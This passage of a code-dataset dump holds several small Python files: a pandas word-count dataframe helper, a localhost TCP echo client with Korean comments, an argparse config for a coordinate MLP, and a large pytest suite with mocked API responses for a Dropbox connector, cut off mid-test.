FileResponse(\"templates/HRI_RETURN.html\")\n","repo_name":"ydoo123/capstone_design","sub_path":"myapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31657602345","text":"import pandas as pd\n\n\ndef get_dataframe_row(wordCount: {}, columns: [str]) -> [int]:\n row = []\n for entry in columns:\n if entry in wordCount:\n row.append(wordCount[entry])\n else:\n row.append(0)\n return row\n\n\ndef build_dataframe_without_topics(wordCounts, globalDictionary) -> pd.DataFrame:\n columns = [*globalDictionary]\n dataframe = pd.DataFrame(columns=columns)\n row_index = 1\n for key in wordCounts.keys():\n row = get_dataframe_row(wordCounts[key], columns)\n dataframe.loc[row_index] = row\n row_index += 1\n return dataframe\n\n\ndef add_column_to_dataframe(dataset: pd.DataFrame, columns) -> pd.DataFrame:\n column_dataframe = pd.DataFrame(columns[1:], columns=[columns[0]])\n return pd.concat([dataset, column_dataframe], axis=1)\n\n\ndef add_topics_to_dataset(dataset: pd.DataFrame, topics: {}) -> pd.DataFrame:\n columns = [\"topics\"]\n for key in topics.keys():\n topics_string = \"\"\n for topic in topics[key]:\n topics_string += topic + \",\"\n topics_string = topics_string[:-1]\n columns.append(topics_string)\n return add_column_to_dataframe(dataset, columns)\n","repo_name":"precupstefan/textmining","sub_path":"util/pd_util.py","file_name":"pd_util.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41513229728","text":"import socket\n\nHOST = '127.0.0.1' #접속할 서버 주소=> 서버에서 설정한 서버ip\nPORT = 8888 #서버에서 지정해 놓은 포트번호\n\n#소켓 객체를 생성\n#주소 체계로 IPv4, 소켓 타입으로 TCP 사용\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n#서버 accept()에 연결요청.\n#지정한 host와 port를 사용하여 서버에 접속\nclient_socket.connect((HOST, PORT))\n\n#무한 루프 돌기\nwhile True:\n message = input('message:') #서버로 보낼 메세지 입력\n client_socket.sendall(message.encode())\t#서버로 메세지를 전송\n\n data = client_socket.recv(1024) #서버로부터 데이터를 수신\n print('Received', data.decode()) #읽은 데이터 복호화\n if message=='/end': #/end입력시 서버, 클라이언트 모두 종료\n break\n\nclient_socket.close() #소켓 닫기","repo_name":"KIMGEONHWI/Tcp-Socket-Programming","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27782434226","text":"import argparse\n\ndef get_opts():\n parser = argparse.ArgumentParser()\n\n # Image path with help of argparse required=True\n parser.add_argument('--image_path', type=str, required=True, help='Path to image')\n\n # network structure with choices identity, mlp, pe\n parser.add_argument('--arch', type=str, default='identity', choices=['identity','pe'], help='Network architecture')\n\n # batch size with 4\n parser.add_argument('--batch_size', type=int, default=256 * 256, help='Batch size')\n\n # epochs with 10\n parser.add_argument('--epochs', type=int, default=2000, help='Number of epochs')\n\n # learning rate with 0.001\n parser.add_argument('--lr', type=float, default=0.0001, help='Learning rate')\n\n # experiment name\n parser.add_argument('--exp_name', type=str, default='exp', help='Experiment name')\n\n return parser.parse_args()\n\n\n\n\n\n\n","repo_name":"pira998/coordinate_mlp","sub_path":"opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41170106840","text":"import json\nfrom unittest import mock\nfrom unittest.mock import ANY, AsyncMock, Mock, patch\n\nimport aiohttp\nimport pytest\nfrom aiohttp import StreamReader\nfrom aiohttp.client_exceptions import ClientResponseError, ServerDisconnectedError\nfrom freezegun import freeze_time\n\nfrom connectors.filtering.validation import SyncRuleValidationResult\nfrom connectors.protocol import Filter\nfrom connectors.source import ConfigurableFieldValueError, DataSourceConfiguration\nfrom connectors.sources.dropbox import (\n DropBoxAdvancedRulesValidator,\n DropboxClient,\n DropboxDataSource,\n InvalidClientCredentialException,\n InvalidPathException,\n InvalidRefreshTokenException,\n)\nfrom tests.commons import AsyncIterator\nfrom tests.sources.support import create_source\n\nPATH = \"/\"\nDUMMY_VALUES = \"abc#123\"\nADVANCED_SNIPPET = \"advanced_snippet\"\n\nHOST_URLS = {\n \"ACCESS_TOKEN_HOST_URL\": \"https://api.dropboxapi.com/\",\n \"FILES_FOLDERS_HOST_URL\": \"https://api.dropboxapi.com/2/\",\n \"DOWNLOAD_HOST_URL\": \"https://content.dropboxapi.com/2/\",\n}\nPING = \"users/get_current_account\"\n\nMOCK_CURRENT_USER = {\n \"account_id\": \"acc_id:1234\",\n \"name\": {\n \"given_name\": \"John\",\n \"surname\": \"Wilber\",\n \"display_name\": \"John Wilber\",\n \"abbreviated_name\": \"JW\",\n },\n \"email\": \"john.wilber@abcd.com\",\n \"country\": \"US\",\n}\n\nMOCK_CHECK_PATH = {\n \".tag\": \"folder\",\n \"name\": \"shared\",\n \"path_lower\": \"/shared\",\n \"path_display\": \"/shared\",\n \"id\": \"id:abcd\",\n \"shared_folder_id\": \"1234\",\n}\n\nMOCK_ACCESS_TOKEN = {\"access_token\": \"test2344\", \"expires_in\": \"1234555\"}\nMOCK_ACCESS_TOKEN_FOR_INVALID_REFRESH_TOKEN = {\"error\": \"invalid_grant\"}\nMOCK_ACCESS_TOKEN_FOR_INVALID_APP_KEY = {\n \"error\": \"invalid_client: Invalid client_id or client_secret\"\n}\n\nMOCK_FILES_FOLDERS = {\n \"entries\": [\n {\n \".tag\": \"folder\",\n \"name\": \"dummy folder\",\n \"path_lower\": \"/test/dummy folder\",\n \"path_display\": \"/test/dummy folder\",\n \"id\": \"id:1\",\n },\n ],\n \"cursor\": \"abcd#1234\",\n \"has_more\": True,\n}\n\nMOCK_FILES_FOLDERS_CONTINUE = {\n \"entries\": [\n {\n \".tag\": \"file\",\n \"name\": \"index.py\",\n \"path_lower\": \"/test/dummy folder/index.py\",\n \"path_display\": \"/test/dummy folder/index.py\",\n \"id\": \"id:2\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"is_downloadable\": True,\n },\n ],\n \"cursor\": None,\n \"has_more\": False,\n}\n\nEXPECTED_FILES_FOLDERS = [\n {\n \"_id\": \"id:1\",\n \"type\": \"Folder\",\n \"name\": \"dummy folder\",\n \"file_path\": \"/test/dummy folder\",\n \"size\": 0,\n \"_timestamp\": \"2023-01-01T06:06:06+00:00\",\n },\n {\n \"_id\": \"id:2\",\n \"type\": \"File\",\n \"name\": \"index.py\",\n \"file_path\": \"/test/dummy folder/index.py\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n]\n\nMOCK_SHARED_FILES = {\n \"entries\": [\n {\n \"access_type\": {\".tag\": \"viewer\"},\n \"name\": \"index1.py\",\n \"id\": \"id:1\",\n \"time_invited\": \"2023-01-01T06:06:06Z\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n },\n ],\n \"cursor\": \"abcd#1234\",\n}\n\nMOCK_SHARED_FILES_CONTINUE = {\n \"entries\": [\n {\n \"access_type\": {\".tag\": \"viewer\"},\n \"name\": \"index2.py\",\n \"id\": \"id:2\",\n \"time_invited\": \"2023-01-01T06:06:06Z\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n },\n ],\n \"cursor\": None,\n}\n\nMOCK_RECEIVED_FILE_METADATA_1 = {\n \"name\": \"index1.py\",\n \"id\": \"id:1\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"preview_type\": \"text\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n}\n\nMOCK_RECEIVED_FILE_METADATA_2 = {\n \"name\": \"index2.py\",\n \"id\": \"id:2\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"preview_type\": \"text\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n}\n\nEXPECTED_SHARED_FILES = [\n {\n \"_id\": \"id:1\",\n \"type\": \"File\",\n \"name\": \"index1.py\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n {\n \"_id\": \"id:2\",\n \"type\": \"File\",\n \"name\": \"index2.py\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n]\n\nMOCK_ATTACHMENT = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_PAPER_FILE = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.paper\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.paper?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file.paper\",\n}\n\nSKIPPED_ATTACHMENT = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_ATTACHMENT_WITHOUT_EXTENSION = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file\",\n}\n\nMOCK_ATTACHMENT_WITH_LARGE_DATA = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 23000000,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_ATTACHMENT_WITH_UNSUPPORTED_EXTENSION = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.xyz\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 23000000,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.xyz?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.xyz\",\n}\n\nRESPONSE_CONTENT = \"# This is the dummy file\"\nEXPECTED_CONTENT = {\n \"_id\": \"id:1\",\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n \"_attachment\": \"IyBUaGlzIGlzIHRoZSBkdW1teSBmaWxl\",\n}\n\nMOCK_SEARCH_FILE_1 = {\n \"has_more\": False,\n \"matches\": [\n {\n \"match_type\": {\".tag\": \"filename_and_content\"},\n \"metadata\": {\n \".tag\": \"metadata\",\n \"metadata\": {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"abc123\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"500_Copy.py\",\n \"path_display\": \"/500_files/500_Copy.py\",\n \"path_lower\": \"/500_files/500_Copy.py\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 512000,\n },\n },\n }\n ],\n}\n\nMOCK_SEARCH_FILE_2 = {\n \"has_more\": False,\n \"matches\": [\n {\n \"match_type\": {\".tag\": \"filename_and_content\"},\n \"metadata\": {\n \".tag\": \"metadata\",\n \"metadata\": {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"abc321\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"dummy_file.txt\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/xyz456/dummy_file.txt?dl=0\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n },\n },\n }\n ],\n}\n\nMOCK_SEARCH_FILE_3 = {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"pqr123\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"dummy_file.txt\",\n \"url\": \"https://www.dropbox.com/scl/fi/pqr123/dummy_file.txt?dl=0\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n}\n\n\nclass JSONAsyncMock(AsyncMock):\n def __init__(self, json, status, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._json = json\n self.status = status\n\n async def json(self):\n return self._json\n\n\nclass StreamReaderAsyncMock(AsyncMock):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.content = StreamReader\n\n\ndef get_json_mock(mock_response, status):\n async_mock = AsyncMock()\n async_mock.__aenter__ = AsyncMock(\n return_value=JSONAsyncMock(json=mock_response, status=status)\n )\n return async_mock\n\n\ndef get_stream_reader():\n async_mock = AsyncMock()\n async_mock.__aenter__ = AsyncMock(return_value=StreamReaderAsyncMock())\n return async_mock\n\n\ndef setup_dropbox():\n # Set up default config with default values\n source = create_source(DropboxDataSource)\n source.configuration.set_field(name=\"app_key\", value=\"abc#123\")\n source.configuration.set_field(name=\"app_secret\", value=\"abc#123\")\n source.configuration.set_field(name=\"refresh_token\", value=\"abc#123\")\n return source\n\n\n@pytest.mark.asyncio\nasync def test_configuration():\n \"\"\"Tests the get configurations method of the Dropbox source class.\"\"\"\n config = DataSourceConfiguration(\n config=DropboxDataSource.get_default_configuration()\n )\n assert config[\"path\"] == PATH\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"field\",\n [\"path\", \"app_key\", \"app_secret\", \"refresh_token\"],\n)\nasync def test_validate_configuration_with_empty_fields_then_raise_exception(field):\n source = setup_dropbox()\n source.dropbox_client.configuration.set_field(name=field, value=\"\")\n\n with pytest.raises(ConfigurableFieldValueError):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\nasync def test_validate_configuration_with_valid_path():\n source = setup_dropbox()\n source.dropbox_client.configuration.set_field(name=\"path\", value=\"/shared\")\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=JSONAsyncMock(json=MOCK_CHECK_PATH, status=200),\n ):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_validate_configuration_with_invalid_path_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n source.dropbox_client.path = \"/abc\"\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=ClientResponseError(\n status=409,\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=None,\n ),\n ):\n with pytest.raises(\n InvalidPathException, match=\"Configured Path: /abc is invalid\"\n ):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\nasync def test_set_access_token():\n source = setup_dropbox()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(mock_response=MOCK_ACCESS_TOKEN, status=200),\n ):\n await source.dropbox_client._set_access_token()\n assert source.dropbox_client.access_token == \"test2344\"\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_set_access_token_with_incorrect_app_key_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(\n mock_response=MOCK_ACCESS_TOKEN_FOR_INVALID_APP_KEY, status=400\n ),\n ):\n with pytest.raises(\n InvalidClientCredentialException,\n match=\"Configured App Key or App Secret is invalid.\",\n ):\n await source.dropbox_client._set_access_token()\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_set_access_token_with_incorrect_refresh_token_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(\n mock_response=MOCK_ACCESS_TOKEN_FOR_INVALID_REFRESH_TOKEN, status=400\n ),\n ):\n with pytest.raises(\n InvalidRefreshTokenException, match=\"Configured Refresh Token is invalid.\"\n ):\n await source.dropbox_client._set_access_token()\n\n\ndef test_tweak_bulk_options():\n source = setup_dropbox()\n\n source.concurrent_downloads = 10\n options = {\"concurrent_downloads\": 5}\n\n source.tweak_bulk_options(options)\n assert options[\"concurrent_downloads\"] == 10\n\n\n@pytest.mark.asyncio\nasync def test_close_with_client_session():\n source = setup_dropbox()\n _ = source.dropbox_client._get_session\n\n await source.close()\n assert hasattr(source.dropbox_client.__dict__, \"_get_session\") is False\n\n\n@pytest.mark.asyncio\nasync def test_ping():\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(MOCK_CURRENT_USER, 200),\n ):\n await source.ping()\n\n\n@pytest.mark.asyncio\n@patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0)\nasync def test_api_call_negative():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 4\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession, \"post\", side_effect=Exception(\"Something went wrong\")\n ):\n with pytest.raises(Exception):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n\n with patch.object(\n aiohttp.ClientSession, \"post\", side_effect=ServerDisconnectedError()\n ):\n with pytest.raises(Exception):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n\n\n@pytest.mark.asyncio\nasync def test_api_call():\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(MOCK_CURRENT_USER, 200),\n ):\n EXPECTED_RESPONSE = {\n \"account_id\": \"acc_id:1234\",\n \"name\": {\n \"given_name\": \"John\",\n \"surname\": \"Wilber\",\n \"display_name\": \"John Wilber\",\n \"abbreviated_name\": \"JW\",\n },\n \"email\": \"john.wilber@abcd.com\",\n \"country\": \"US\",\n }\n response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await response.json()\n assert actual_response == EXPECTED_RESPONSE\n\n\n@pytest.mark.asyncio\nasync def test_paginated_api_call_when_skipping_api_call():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 1\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n source.dropbox_client, \"api_call\", side_effect=Exception(\"Something went wrong\")\n ):\n async for response in source.dropbox_client._paginated_api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n breaking_field=\"xyz\",\n continue_endpoint=\"shared_file\",\n data={\"data\": \"xyz\"},\n url_name=\"url_name\",\n ):\n assert response is None\n\n\n@pytest.mark.asyncio\nasync def test_set_access_token_when_token_expires_at_is_str():\n source = setup_dropbox()\n source.dropbox_client.token_expiration_time = \"2023-02-10T09:02:23.629821\"\n mock_token = {\"access_token\": \"test2344\", \"expires_in\": \"1234555\"}\n async_response_token = get_json_mock(mock_token, 200)\n\n with patch.object(aiohttp.ClientSession, \"post\", return_value=async_response_token):\n actual_response = await source.dropbox_client._set_access_token()\n assert actual_response is None\n\n\n@pytest.fixture\ndef patch_default_wait_multiplier():\n with mock.patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0):\n yield\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0)\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_api_call_when_token_is_expired(mock_apply_retry_strategy):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=[\n ClientResponseError(\n status=401,\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=None,\n message=\"Unauthorized\",\n ),\n get_json_mock(MOCK_ACCESS_TOKEN, 200),\n get_json_mock(MOCK_FILES_FOLDERS, 200),\n ],\n ):\n actual_response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await actual_response.json()\n assert actual_response == MOCK_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\nasync def test_api_call_when_status_429_exception():\n source = setup_dropbox()\n\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=[\n ClientResponseError(\n status=429,\n headers={\"Retry-After\": 0},\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=(),\n ),\n get_json_mock(MOCK_FILES_FOLDERS, 200),\n ],\n ):\n _ = source.dropbox_client._get_session\n response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await response.json()\n assert actual_response == MOCK_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\n@patch(\"connectors.sources.dropbox.DEFAULT_RETRY_AFTER\", 0)\nasync def test_api_call_when_status_429_exception_without_retry_after_header():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 1\n\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=ClientResponseError(\n status=429,\n headers={},\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=(),\n ),\n ):\n _ = source.dropbox_client._get_session\n with pytest.raises(ClientResponseError):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n await source.close()\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"attachment, is_shared, expected_content\",\n [\n (MOCK_ATTACHMENT, False, EXPECTED_CONTENT),\n (MOCK_PAPER_FILE, False, EXPECTED_CONTENT),\n (MOCK_ATTACHMENT, True, EXPECTED_CONTENT),\n (MOCK_ATTACHMENT_WITHOUT_EXTENSION, False, None),\n (MOCK_ATTACHMENT_WITH_LARGE_DATA, False, None),\n (MOCK_ATTACHMENT_WITH_UNSUPPORTED_EXTENSION, False, None),\n (SKIPPED_ATTACHMENT, False, None),\n ],\n)\nasync def test_get_content_when_is_downloadable_is_true(\n attachment, is_shared, expected_content\n):\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n\n with mock.patch(\"aiohttp.ClientSession.post\", return_value=get_stream_reader()):\n with mock.patch(\n \"aiohttp.StreamReader.iter_chunked\",\n return_value=AsyncIterator([bytes(RESPONSE_CONTENT, \"utf-8\")]),\n ):\n response = await source.get_content(\n attachment=attachment,\n is_shared=is_shared,\n doit=True,\n )\n assert response == expected_content\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_fetch_files_folders():\n source = setup_dropbox()\n source.dropbox_client.path = \"/\"\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_FILES_FOLDERS, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_FILES_FOLDERS_CONTINUE, status=200)]),\n ],\n ):\n async for document, _ in source._fetch_files_folders(\"/\"):\n actual_response.append(document)\n\n assert actual_response == EXPECTED_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_fetch_shared_files():\n source = setup_dropbox()\n source.dropbox_client.path = \"/\"\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_SHARED_FILES, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_RECEIVED_FILE_METADATA_1, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_SHARED_FILES_CONTINUE, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_RECEIVED_FILE_METADATA_2, status=200)]),\n ],\n ):\n async for document, _ in source._fetch_shared_files():\n actual_response.append(document)\n\n assert actual_response == EXPECTED_SHARED_FILES\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_search_files():\n source = setup_dropbox()\n rule = {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/500_files\",\n \"file_status\": \"active\",\n },\n }\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_SEARCH_FILE_1, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_SEARCH_FILE_2, status=200)]),\n ],\n ):\n async for document, _ in source.advanced_sync(rule=rule):\n actual_response.append(document)\n\n assert actual_response == [\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"500_Copy.py\",\n \"file_path\": \"/500_files/500_Copy.py\",\n \"size\": 512000,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n }\n ]\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\n@patch.object(\n DropboxDataSource,\n \"_fetch_files_folders\",\n side_effect=AsyncIterator(\n [\n (EXPECTED_FILES_FOLDERS[0], \"files-folders\"),\n (EXPECTED_FILES_FOLDERS[1], \"files-folders\"),\n ],\n ),\n)\n@patch.object(\n DropboxDataSource,\n \"_fetch_shared_files\",\n return_value=AsyncIterator(\n [\n (EXPECTED_SHARED_FILES[0], \"shared_files\"),\n (EXPECTED_SHARED_FILES[1], \"shared_files\"),\n ],\n ),\n)\nasync def test_get_docs(files_folders_patch, shared_files_patch):\n source = setup_dropbox()\n expected_responses = [*EXPECTED_FILES_FOLDERS, *EXPECTED_SHARED_FILES]\n source.get_content = Mock(return_value=EXPECTED_CONTENT)\n\n documents = []\n async for item, _ in source.get_docs():\n documents.append(item)\n\n assert documents == expected_responses\n\n\n@pytest.mark.parametrize(\n \"advanced_rules, expected_validation_result\",\n [\n (\n [\n {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/invalid_path\",\n \"file_status\": {\".tag\": \"active\"},\n },\n }\n ],\n SyncRuleValidationResult(\n SyncRuleValidationResult.ADVANCED_RULES,\n is_valid=False,\n validation_message=ANY,\n ),\n )\n ],\n)\n@pytest.mark.asyncio\nasync def test_advanced_rules_validation_with_invalid_repos(\n advanced_rules, expected_validation_result\n):\n source = setup_dropbox()\n source.dropbox_client.check_path = AsyncMock(side_effect=InvalidPathException())\n\n validation_result = await DropBoxAdvancedRulesValidator(source).validate(\n advanced_rules\n )\n\n assert validation_result == expected_validation_result\n\n\n@pytest.mark.parametrize(\n \"filtering\",\n [\n Filter(\n {\n ADVANCED_SNIPPET: {\n \"value\": [\n {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/500_files\",\n \"file_status\": {\n \".tag\": \"active\",\n },\n },\n },\n {\n \"query\": \"dummy\",\n \"options\": {\n \"file_extensions\": [\"txt\"],\n },\n },\n {\n \"query\": \"manager\",\n \"options\": {\n \"file_categories\": [{\".tag\": \"paper\"}, {\".tag\": \"pdf\"}],\n },\n },\n ]\n }\n }\n ),\n ],\n)\n@patch.object(\n DropboxClient,\n \"search_files_folders\",\n side_effect=AsyncIterator(\n [\n MOCK_SEARCH_FILE_1,\n MOCK_SEARCH_FILE_2,\n ],\n ),\n)\n@patch.object(\n DropboxClient,\n \"api_call\",\n side_effect=AsyncIterator(\n [JSONAsyncMock(MOCK_SEARCH_FILE_3, 200)],\n ),\n)\n@pytest.mark.asyncio\nasync def test_get_docs_with_advanced_rules(\n received_files_patch, files_folders_patch, filtering\n):\n source = setup_dropbox()\n source.get_content = Mock(return_value=EXPECTED_CONTENT)\n\n documents = 